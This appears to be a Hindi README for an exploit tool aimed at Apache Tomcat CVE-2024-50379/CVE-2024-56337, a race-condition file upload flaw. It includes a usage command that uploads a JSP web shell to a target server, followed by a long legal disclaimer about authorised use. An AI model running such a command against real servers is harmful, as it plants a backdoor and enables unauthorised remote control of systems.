
tomcat CVE-2024-50379/CVE-2024-56337 रेस कंडीशन फ़ाइल अपलोड एक्सप्लॉइट
मैन्युअल एक्सप्लॉइटेशन परेशानी भरा है, इसलिए एक exp बना दिया।।
उपयोग:
shell.jsp शेल फ़ाइल है, ggsl.jsp लक्ष्य सर्वर पर सहेजा जाने वाला नाम/पथ है
./CVE-2024-50379 -u http://192.168.2.245:8080 -f shell.jsp -p ggsl.jsp


यह टूल केवल कानूनी रूप से अधिकृत उद्यम सुरक्षा निर्माण गतिविधियों के लिए है। यदि आपको इस टूल की उपयोगिता का परीक्षण करने की आवश्यकता है, तो कृपया स्वयं लक्ष्य मशीन वातावरण सेट करें।
इस टूल का उपयोग करके जाँच करते समय, आपको यह सुनिश्चित करना चाहिए कि यह कार्य स्थानीय कानूनों और विनियमों का अनुपालन करता है, और आपने पर्याप्त प्राधिकरण प्राप्त किया है। कृपया अनधिकृत लक्ष्यों को स्कैन न करें।
यदि आप इस टूल का उपयोग करते समय कोई अवैध गतिविधि करते हैं, तो आपको स्वयं संबंधित परिणाम भुगतने होंगे, और हम कोई कानूनी या संयुक्त दायित्व नहीं लेंगे।
इस टूल को स्थापित करने और उपयोग करने से पहले, कृपया सभी धाराओं की सामग्री को ध्यानपूर्वक पढ़ें और पूरी तरह से समझें। प्रतिबंध, अस्वीकरण धाराएँ या आपके महत्वपूर्ण अधिकारों से संबंधित अन्य धाराएँ बोल्ड, रेखांकित आदि रूपों में आपका ध्यान आकर्षित करने के लिए संकेतित की जा सकती हैं। जब तक आपने इस समझौते की सभी शर्तों को पूरी तरह से नहीं पढ़ा, पूरी तरह से समझा और स्वीकार नहीं किया है, कृपया इस टूल को स्थापित और उपयोग न करें। यदि आपका उपयोग व्यवहार या किसी अन्य स्पष्ट या निहित तरीके से इस समझौते को स्वीकार करना दर्शाता है, तो यह माना जाएगा कि आपने इस समझौते की बाध्यताओं को पढ़ लिया है और सहमति दे दी है।